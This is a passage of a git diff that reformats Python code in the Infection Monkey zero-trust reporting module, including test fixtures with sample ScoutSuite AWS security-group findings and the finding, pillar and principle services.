+            or rule_status == zero_trust_consts.STATUS_VERIFY
+        ):
             return zero_trust_consts.STATUS_VERIFY
-        elif finding_status == zero_trust_consts.STATUS_PASSED or rule_status == zero_trust_consts.STATUS_PASSED:
+        elif (
+            finding_status == zero_trust_consts.STATUS_PASSED
+            or rule_status == zero_trust_consts.STATUS_PASSED
+        ):
             return zero_trust_consts.STATUS_PASSED
         else:
             return zero_trust_consts.STATUS_UNEXECUTED
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py
index 1ac9afdfe..5ffe194a4 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py
@@ -7,7 +7,9 @@ from monkey_island.cc.database import mongo
 from monkey_island.cc.server_utils.encryptor import initialize_encryptor, get_encryptor
 from monkey_island.cc.services.config import ConfigService
 from common.config_value_paths import AWS_KEYS_PATH
-from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import is_aws_keys_setup
+from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import (
+    is_aws_keys_setup,
+)
 from monkey_island.cc.test_common.fixtures import FixtureEnum
@@ -27,8 +29,12 @@ def test_is_aws_keys_setup(tmp_path):
     # Make sure noone changed config path and broke this function
     initialize_encryptor(tmp_path)
-    bogus_key_value = get_encryptor().enc('bogus_aws_key')
-    dpath.util.set(ConfigService.default_config, AWS_KEYS_PATH+['aws_secret_access_key'], bogus_key_value)
-    dpath.util.set(ConfigService.default_config, AWS_KEYS_PATH+['aws_access_key_id'], bogus_key_value)
+    bogus_key_value = get_encryptor().enc("bogus_aws_key")
+    dpath.util.set(
+        ConfigService.default_config, AWS_KEYS_PATH + ["aws_secret_access_key"], bogus_key_value
+    )
+    dpath.util.set(
+        ConfigService.default_config, AWS_KEYS_PATH + ["aws_access_key_id"], bogus_key_value
+    )
     assert is_aws_keys_setup()
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
index e08c8a290..32491b2c5 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
@@ -1,29 +1,34 @@
 from copy import deepcopy
-from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_consts import RULE_LEVEL_WARNING, RULE_LEVEL_DANGER
-from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ScoutSuiteRuleService
+from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_consts import (
+    RULE_LEVEL_WARNING,
+    RULE_LEVEL_DANGER,
+)
+from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import (
+    ScoutSuiteRuleService,
+)
 from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import RULES
 example_scoutsuite_data = {
-    'checked_items': 179,
-    'compliance': None,
-    'dashboard_name': 'Rules',
-    'description': 'Security Group Opens All Ports to All',
-    'flagged_items': 2,
-    'items': [
-        'ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72'
-        '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR',
-        'ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65'
-        '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR'
+    "checked_items": 179,
+    "compliance": None,
+    "dashboard_name": "Rules",
+    "description": "Security Group Opens All Ports to All",
+    "flagged_items": 2,
+    "items": [
+        "ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72"
+        ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR",
+        "ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65"
+        ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR",
     ],
-    'level': 'danger',
-    'path': 'ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR',
-    'rationale': 'It was detected that all ports in the security group are open, and any source IP address'
-                 ' could send traffic to these ports, which creates a wider attack surface for resources '
-                 'assigned to it. Open ports should be reduced to the minimum needed to correctly',
-    'references': [],
-    'remediation': None,
-    'service': 'EC2'
+    "level": "danger",
+    "path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
+    "rationale": "It was detected that all ports in the security group are open, and any source IP address"
+    " could send traffic to these ports, which creates a wider attack surface for resources "
+    "assigned to it.
 Open ports should be reduced to the minimum needed to correctly",
+    "references": [],
+    "remediation": None,
+    "service": "EC2",
 }
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py
index 549d3161e..de7b5635e 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_zt_finding_service.py
@@ -2,13 +2,17 @@ import pytest
 from monkey_island.cc.models.zero_trust.finding import Finding
 from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding
-from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import ScoutSuiteZTFindingService
-from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import RULES, SCOUTSUITE_FINDINGS
+from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import (
+    ScoutSuiteZTFindingService,
+)
+from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import (
+    RULES,
+    SCOUTSUITE_FINDINGS,
+)
 from monkey_island.cc.test_common.fixtures import FixtureEnum
 class TestScoutSuiteZTFindingService:
-
     @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE)
     def test_process_rule(self):
         # Creates new PermissiveFirewallRules finding with a rule
diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py
index aaea95031..5582bb83d 100644
--- a/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py
@@ -1,23 +1,31 @@
-from common.common_consts.zero_trust_consts import TEST_SCOUTSUITE_SERVICE_SECURITY, STATUS_FAILED, \
-    TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED
+from common.common_consts.zero_trust_consts import (
+    TEST_SCOUTSUITE_SERVICE_SECURITY,
+    STATUS_FAILED,
+    TEST_ENDPOINT_SECURITY_EXISTS,
+    STATUS_PASSED,
+)
 from monkey_island.cc.models.zero_trust.finding import Finding
 from monkey_island.cc.models.zero_trust.monkey_finding import MonkeyFinding
 from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding
-from monkey_island.cc.services.zero_trust.test_common.monkey_finding_data import get_monkey_details_dto
-from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import get_scoutsuite_details_dto
+from monkey_island.cc.services.zero_trust.test_common.monkey_finding_data import (
+    get_monkey_details_dto,
+)
+from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import (
+    get_scoutsuite_details_dto,
+)
 def get_scoutsuite_finding_dto() -> Finding:
     scoutsuite_details = get_scoutsuite_details_dto()
     scoutsuite_details.save()
-    return ScoutSuiteFinding(test=TEST_SCOUTSUITE_SERVICE_SECURITY,
-                             status=STATUS_FAILED,
-                             details=scoutsuite_details)
+    return ScoutSuiteFinding(
+        test=TEST_SCOUTSUITE_SERVICE_SECURITY, status=STATUS_FAILED, details=scoutsuite_details
+    )
 def get_monkey_finding_dto() -> Finding:
     monkey_details = get_monkey_details_dto()
     monkey_details.save()
-    return MonkeyFinding(test=TEST_ENDPOINT_SECURITY_EXISTS,
-                         status=STATUS_PASSED,
-                         details=monkey_details)
+    return MonkeyFinding(
+        test=TEST_ENDPOINT_SECURITY_EXISTS, status=STATUS_PASSED, details=monkey_details
+    )
diff --git
a/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py
index b0050a8c9..0e5433784 100644
--- a/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py
@@ -6,21 +6,24 @@ EVENTS = [
         "timestamp": "2021-01-20T15:40:28.357Z",
         "title": "Process list",
         "message": "Monkey on pc-24 scanned the process list",
-        "event_type": "monkey_local"
+        "event_type": "monkey_local",
     },
     {
         "timestamp": "2021-01-20T16:08:29.519Z",
         "title": "Process list",
         "message": "",
-        "event_type": "monkey_local"
+        "event_type": "monkey_local",
     },
 ]
 EVENTS_DTO = [
-    Event(timestamp=event['timestamp'],
-          title=event['title'],
-          message=event['message'],
-          event_type=event['event_type']) for event in EVENTS
+    Event(
+        timestamp=event["timestamp"],
+        title=event["title"],
+        message=event["message"],
+        event_type=event["event_type"],
+    )
+    for event in EVENTS
 ]
 DETAILS_DTO = []
diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py
index 317697632..978209671 100644
--- a/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py
@@ -1,93 +1,168 @@
 # This is what our codebase receives after running ScoutSuite module.
 # Object '...': {'...': '...'} represents continuation of similar objects as above
 RAW_SCOUTSUITE_DATA = {
-    'sg_map': {
-        'sg-abc': {'region': 'ap-northeast-1', 'vpc_id': 'vpc-abc'},
-        'sg-abcd': {'region': 'ap-northeast-2', 'vpc_id': 'vpc-abc'},
-        '...': {'...': '...'}},
-    'subnet_map': {
-        'subnet-abc': {'region': 'ap-northeast-1', 'vpc_id': 'vpc-abc'},
-        'subnet-abcd': {'region': 'ap-northeast-1', 'vpc_id': 'vpc-abc'},
-        '...': {'...': '...'}
+    "sg_map": {
+        "sg-abc": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"},
+        "sg-abcd": {"region": "ap-northeast-2", "vpc_id": "vpc-abc"},
+        "...": {"...": "..."},
     },
-    'provider_code': 'aws',
-    'provider_name': 'Amazon Web Services',
-    'environment': None,
-    'result_format': 'json',
-    'partition': 'aws',
-    'account_id': '125686982355',
-    'last_run': {
-        'time': '2021-02-05 16:03:04+0200',
-        'run_parameters': {'services': [], 'skipped_services': [], 'regions': [], 'excluded_regions': []},
-        'version': '5.10.0',
-        'ruleset_name': 'default',
-        'ruleset_about': 'This ruleset',
-        'summary': {'ec2': {'checked_items': 3747, 'flagged_items': 262, 'max_level': 'warning', 'rules_count': 28,
                            'resources_count': 176},
-                    's3': {'checked_items': 88, 'flagged_items': 25, 'max_level': 'danger', 'rules_count': 18,
                           'resources_count': 5},
-                    '...': {'...': '...'}}},
-    'metadata': {
-        'compute': {
-            'summaries': {'external attack surface': {'cols': 1,
                                                       'path': 'service_groups.compute.summaries.external_attack_surface',
                                                       'callbacks': [
                                                           ['merge', {'attribute': 'external_attack_surface'}]]}},
-            '...': {'...': '...'}
+    "subnet_map": {
+        "subnet-abc": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"},
+        "subnet-abcd": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"},
+        "...": {"...": "..."},
+    },
+    "provider_code": "aws",
+    "provider_name": "Amazon Web Services",
+    "environment": None,
+    "result_format": "json",
+    "partition": "aws",
+    "account_id": "125686982355",
+    "last_run": {
+        "time": "2021-02-05 16:03:04+0200",
+        "run_parameters": {
+            "services": [],
"skipped_services": [], + "regions": [], + "excluded_regions": [], + }, + "version": "5.10.0", + "ruleset_name": "default", + "ruleset_about": "This ruleset", + "summary": { + "ec2": { + "checked_items": 3747, + "flagged_items": 262, + "max_level": "warning", + "rules_count": 28, + "resources_count": 176, + }, + "s3": { + "checked_items": 88, + "flagged_items": 25, + "max_level": "danger", + "rules_count": 18, + "resources_count": 5, + }, + "...": {"...": "..."}, }, - '...': {'...': '...'} }, - + "metadata": { + "compute": { + "summaries": { + "external attack surface": { + "cols": 1, + "path": "service_groups.compute.summaries.external_attack_surface", + "callbacks": [["merge", {"attribute": "external_attack_surface"}]], + } + }, + "...": {"...": "..."}, + }, + "...": {"...": "..."}, + }, # This is the important part, which we parse to get resources - 'services': { - 'ec2': {'regions': { - 'ap-northeast-1': { - 'vpcs': { - 'vpc-abc': { - 'id': 'vpc-abc', - 'security_groups': { - 'sg-abc': { - 'name': 'default', - 'rules': { - 'ingress': {'protocols': { - 'ALL': {'ports': {'1-65535': {'cidrs': [{'CIDR': '0.0.0.0/0'}]}}}}, - 'count': 1}, - 'egress': {'protocols': { - 'ALL': {'ports': {'1-65535': {'cidrs': [{'CIDR': '0.0.0.0/0'}]}}}}, - 'count': 1}} - } - }}}, - '...': {'...': '...'} - }}, + "services": { + "ec2": { + "regions": { + "ap-northeast-1": { + "vpcs": { + "vpc-abc": { + "id": "vpc-abc", + "security_groups": { + "sg-abc": { + "name": "default", + "rules": { + "ingress": { + "protocols": { + "ALL": { + "ports": { + "1-65535": { + "cidrs": [{"CIDR": "0.0.0.0/0"}] + } + } + } + }, + "count": 1, + }, + "egress": { + "protocols": { + "ALL": { + "ports": { + "1-65535": { + "cidrs": [{"CIDR": "0.0.0.0/0"}] + } + } + } + }, + "count": 1, + }, + }, + } + }, + } + }, + "...": {"...": "..."}, + } + }, # Interesting info, maybe could be used somewhere in the report - 'external_attack_surface': { - '52.52.52.52': {'protocols': {'TCP': {'ports': {'22': {'cidrs': [{'CIDR': '0.0.0.0/0'}]}}}}, - 'InstanceName': 'InstanceName', - 'PublicDnsName': 'ec2-52-52-52-52.eu-central-1.compute.amazonaws.com'}}, + "external_attack_surface": { + "52.52.52.52": { + "protocols": {"TCP": {"ports": {"22": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}}, + "InstanceName": "InstanceName", + "PublicDnsName": "ec2-52-52-52-52.eu-central-1.compute.amazonaws.com", + } + }, # We parse these into ScoutSuite security rules - 'findings': { - 'ec2-security-group-opens-all-ports-to-all': { - 'description': 'Security Group Opens All Ports to All', - 'path': 'ec2.regions.id.vpcs.id.security_groups' - '.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR', - 'level': 'danger', - 'display_path': 'ec2.regions.id.vpcs.id.security_groups.id', - 'items': [ - 'ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups' - '.sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR'], - 'dashboard_name': 'Rules', - 'checked_items': 179, - 'flagged_items': 2, - 'service': 'EC2', - 'rationale': 'It was detected that all ports in the security group are open <...>', - 'remediation': None, 'compliance': None, 'references': None}, - '...': {'...': '...'} - } + "findings": { + "ec2-security-group-opens-all-ports-to-all": { + "description": "Security Group Opens All Ports to All", + "path": "ec2.regions.id.vpcs.id.security_groups" + ".id.rules.id.protocols.id.ports.id.cidrs.id.CIDR", + "level": "danger", + "display_path": "ec2.regions.id.vpcs.id.security_groups.id", + "items": [ + "ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups" + 
".sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR" + ], + "dashboard_name": "Rules", + "checked_items": 179, + "flagged_items": 2, + "service": "EC2", + "rationale": "It was detected that all ports in the security group are open <...>", + "remediation": None, + "compliance": None, + "references": None, + }, + "...": {"...": "..."}, + }, }, - '...': {'...': '...'} + "...": {"...": "..."}, }, - 'service_list': ['acm', 'awslambda', 'cloudformation', 'cloudtrail', 'cloudwatch', 'config', 'directconnect', - 'dynamodb', 'ec2', 'efs', 'elasticache', 'elb', 'elbv2', 'emr', 'iam', 'kms', 'rds', 'redshift', - 'route53', 's3', 'ses', 'sns', 'sqs', 'vpc', 'secretsmanager'], - 'service_groups': {'...': {'...': '...'}} + "service_list": [ + "acm", + "awslambda", + "cloudformation", + "cloudtrail", + "cloudwatch", + "config", + "directconnect", + "dynamodb", + "ec2", + "efs", + "elasticache", + "elb", + "elbv2", + "emr", + "iam", + "kms", + "rds", + "redshift", + "route53", + "s3", + "ses", + "sns", + "sqs", + "vpc", + "secretsmanager", + ], + "service_groups": {"...": {"...": "..."}}, } diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py index fb9722ca2..4e428794d 100644 --- a/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py +++ b/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py @@ -1,70 +1,72 @@ from monkey_island.cc.models.zero_trust.scoutsuite_finding_details import ScoutSuiteFindingDetails from monkey_island.cc.models.zero_trust.scoutsuite_rule import ScoutSuiteRule -from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import PermissiveFirewallRules, \ - UnencryptedData - -SCOUTSUITE_FINDINGS = [ +from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import ( PermissiveFirewallRules, - UnencryptedData -] + UnencryptedData, +) + +SCOUTSUITE_FINDINGS = [PermissiveFirewallRules, UnencryptedData] RULES = [ ScoutSuiteRule( checked_items=179, compliance=None, - dashboard_name='Rules', - description='Security Group Opens All Ports to All', + dashboard_name="Rules", + description="Security Group Opens All Ports to All", flagged_items=2, items=[ - 'ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72' - '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR', - 'ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65' - '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR' + "ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72" + ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR", + "ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65" + ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR", ], - level='danger', - path='ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR', - rationale='It was detected that all ports in the security group are open, and any source IP address' - ' could send traffic to these ports, which creates a wider attack surface for resources ' - 'assigned to it. 
 Open ports should be reduced to the minimum needed to correctly',
+        level="danger",
+        path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
+        rationale="It was detected that all ports in the security group are open, and any source IP address"
+        " could send traffic to these ports, which creates a wider attack surface for resources "
+        "assigned to it. Open ports should be reduced to the minimum needed to correctly",
         references=[],
         remediation=None,
-        service='EC2'
+        service="EC2",
     ),
     ScoutSuiteRule(
         checked_items=179,
-        compliance=[{'name': 'CIS Amazon Web Services Foundations', 'version': '1.0.0', 'reference': '4.1'},
                    {'name': 'CIS Amazon Web Services Foundations', 'version': '1.0.0', 'reference': '4.2'},
                    {'name': 'CIS Amazon Web Services Foundations', 'version': '1.1.0', 'reference': '4.1'},
                    {'name': 'CIS Amazon Web Services Foundations', 'version': '1.1.0', 'reference': '4.2'},
                    {'name': 'CIS Amazon Web Services Foundations', 'version': '1.2.0', 'reference': '4.1'},
                    {'name': 'CIS Amazon Web Services Foundations', 'version': '1.2.0', 'reference': '4.2'}],
-        dashboard_name='Rules',
-        description='Security Group Opens RDP Port to All',
+        compliance=[
+            {"name": "CIS Amazon Web Services Foundations", "version": "1.0.0", "reference": "4.1"},
+            {"name": "CIS Amazon Web Services Foundations", "version": "1.0.0", "reference": "4.2"},
+            {"name": "CIS Amazon Web Services Foundations", "version": "1.1.0", "reference": "4.1"},
+            {"name": "CIS Amazon Web Services Foundations", "version": "1.1.0", "reference": "4.2"},
+            {"name": "CIS Amazon Web Services Foundations", "version": "1.2.0", "reference": "4.1"},
+            {"name": "CIS Amazon Web Services Foundations", "version": "1.2.0", "reference": "4.2"},
+        ],
+        dashboard_name="Rules",
+        description="Security Group Opens RDP Port to All",
         flagged_items=7,
         items=[
-            'ec2.regions.eu-central-1.vpcs.vpc-076500a2138ee09da.security_groups.sg-00bdef5951797199c'
            '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR',
-            'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-007931ba8a364e330'
            '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR',
-            'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-05014daf996b042dd'
            '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR',
-            'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0c745fe56c66335b2'
            '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR',
-            'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0f99b85cfad63d1b1'
            '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR',
-            'ec2.regions.us-east-1.vpcs.vpc-9e56cae4.security_groups.sg-0dc253aa79062835a'
            '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR',
-            'ec2.regions.us-east-1.vpcs.vpc-002d543353cd4e97d.security_groups.sg-01902f153d4f938da'
            '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR'],
-        level='danger',
-        path='ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR',
-        rationale='The security group was found to be exposing a well-known port to all source addresses.'
                  ' Well-known ports are commonly probed by automated scanning tools, and could be an indicator '
                  'of sensitive services exposed to Internet.
 If such services need to be expos',
+            "ec2.regions.eu-central-1.vpcs.vpc-076500a2138ee09da.security_groups.sg-00bdef5951797199c"
+            ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+            "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-007931ba8a364e330"
+            ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+            "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-05014daf996b042dd"
+            ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+            "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0c745fe56c66335b2"
+            ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+            "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0f99b85cfad63d1b1"
+            ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+            "ec2.regions.us-east-1.vpcs.vpc-9e56cae4.security_groups.sg-0dc253aa79062835a"
+            ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+            "ec2.regions.us-east-1.vpcs.vpc-002d543353cd4e97d.security_groups.sg-01902f153d4f938da"
+            ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+        ],
+        level="danger",
+        path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
+        rationale="The security group was found to be exposing a well-known port to all source addresses."
+        " Well-known ports are commonly probed by automated scanning tools, and could be an indicator "
+        "of sensitive services exposed to Internet. If such services need to be expos",
         references=[],
-        remediation='Remove the inbound rules that expose open ports',
-        service='EC2'
-    )
+        remediation="Remove the inbound rules that expose open ports",
+        service="EC2",
+    ),
 ]
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py
index 5b69d6ad9..cf65819df 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py
@@ -8,7 +8,9 @@ from common.utils.exceptions import UnknownFindingError
 from monkey_island.cc.models.zero_trust.finding import Finding
 from monkey_island.cc.models.zero_trust.monkey_finding import MonkeyFinding
 from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding
-from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import MonkeyZTDetailsService
+from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import (
+    MonkeyZTDetailsService,
+)
 @dataclass
@@ -22,7 +24,6 @@ class EnrichedFinding:
 class FindingService:
-
     @staticmethod
     def get_all_findings_from_db() -> List[Finding]:
         return list(Finding.objects)
@@ -39,14 +40,14 @@ class FindingService:
     @staticmethod
     def _get_enriched_finding(finding: Finding) -> EnrichedFinding:
-        test_info = zero_trust_consts.TESTS_MAP[finding['test']]
+        test_info = zero_trust_consts.TESTS_MAP[finding["test"]]
         enriched_finding = EnrichedFinding(
-            finding_id=str(finding['_id']),
-            test=test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding['status']],
-            test_key=finding['test'],
+            finding_id=str(finding["_id"]),
+            test=test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding["status"]],
+            test_key=finding["test"],
             pillars=test_info[zero_trust_consts.PILLARS_KEY],
-            status=finding['status'],
-            details=None
+            status=finding["status"],
+            details=None,
         )
         return enriched_finding
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py
b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py
index 4f9c067f6..fda738c45 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py
@@ -3,12 +3,13 @@ from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service impo
 class PillarService:
-
     @staticmethod
     def get_pillar_report_data():
-        return {"statusesToPillars": PillarService._get_statuses_to_pillars(),
-                "pillarsToStatuses": PillarService._get_pillars_to_statuses(),
-                "grades": PillarService._get_pillars_grades()}
+        return {
+            "statusesToPillars": PillarService._get_statuses_to_pillars(),
+            "pillarsToStatuses": PillarService._get_pillars_to_statuses(),
+            "grades": PillarService._get_pillars_grades(),
+        }
     @staticmethod
     def _get_pillars_grades():
@@ -25,7 +26,7 @@ class PillarService:
             zero_trust_consts.STATUS_FAILED: 0,
             zero_trust_consts.STATUS_VERIFY: 0,
             zero_trust_consts.STATUS_PASSED: 0,
-            zero_trust_consts.STATUS_UNEXECUTED: 0
+            zero_trust_consts.STATUS_UNEXECUTED: 0,
         }
         tests_of_this_pillar = zero_trust_consts.PILLARS_TO_TESTS[pillar]
@@ -40,7 +41,9 @@ class PillarService:
             if pillar in test_info[zero_trust_consts.PILLARS_KEY]:
                 pillar_grade[finding.status] += 1
-        pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = list(test_unexecuted.values()).count(True)
+        pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = list(test_unexecuted.values()).count(
+            True
+        )
         return pillar_grade
@@ -50,7 +53,7 @@ class PillarService:
             zero_trust_consts.STATUS_FAILED: [],
             zero_trust_consts.STATUS_VERIFY: [],
             zero_trust_consts.STATUS_PASSED: [],
-            zero_trust_consts.STATUS_UNEXECUTED: []
+            zero_trust_consts.STATUS_UNEXECUTED: [],
         }
         for pillar in zero_trust_consts.PILLARS:
             results[PillarService.__get_status_of_single_pillar(pillar)].append(pillar)
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py
index 006cb053e..671d1da44 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py
@@ -3,7 +3,6 @@ from monkey_island.cc.models.zero_trust.finding import Finding
 class PrincipleService:
-
     @staticmethod
     def get_principles_status():
         all_principles_statuses = {}
@@ -18,7 +17,7 @@ class PrincipleService:
                 {
                     "principle": zero_trust_consts.PRINCIPLES[principle],
                     "tests": PrincipleService.__get_tests_status(principle_tests),
-                    "status": PrincipleService.__get_principle_status(principle_tests)
+                    "status": PrincipleService.__get_principle_status(principle_tests),
                 }
             )
@@ -29,11 +28,12 @@ class PrincipleService:
         worst_status = zero_trust_consts.STATUS_UNEXECUTED
         all_statuses = set()
         for test in principle_tests:
-            all_statuses |= set(Finding.objects(test=test).distinct('status'))
+            all_statuses |= set(Finding.objects(test=test).distinct("status"))
         for status in all_statuses:
-            if zero_trust_consts.ORDERED_TEST_STATUSES.index(status) \
-                    < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status):
+            if zero_trust_consts.ORDERED_TEST_STATUSES.index(
+                status
+            ) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status):
                 worst_status = status
         return worst_status
@@ -45,8 +45,10 @@ class PrincipleService:
             test_findings = Finding.objects(test=test)
             results.append(
                 {
-                    "test": zero_trust_consts.TESTS_MAP[test][zero_trust_consts.TEST_EXPLANATION_KEY],
